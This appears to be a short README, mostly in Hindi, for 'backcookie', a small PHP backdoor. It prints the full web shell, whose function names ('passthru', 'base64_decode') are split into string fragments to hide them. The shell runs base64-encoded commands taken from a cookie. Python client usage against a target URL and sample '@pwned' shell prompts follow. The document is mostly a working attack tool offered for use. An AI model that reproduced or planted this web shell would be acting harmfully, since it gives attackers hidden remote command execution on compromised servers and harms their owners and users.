
कुकी का उपयोग करने वाला छोटा बैकडोर।
कुकी का उपयोग करने वाला छोटा बैकडोर।
==========
<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie
कस्टम कमांड (binfo), आपको वस्तुनिष्ठ जानकारी मिलती है
@pwned:~$ binfo
कस्टम कमांड (exit), बाहर निकलने के लिए।
@pwned:~$ exit
कॉपीराइट, 2013 - 2016 Jose Pino द्वारा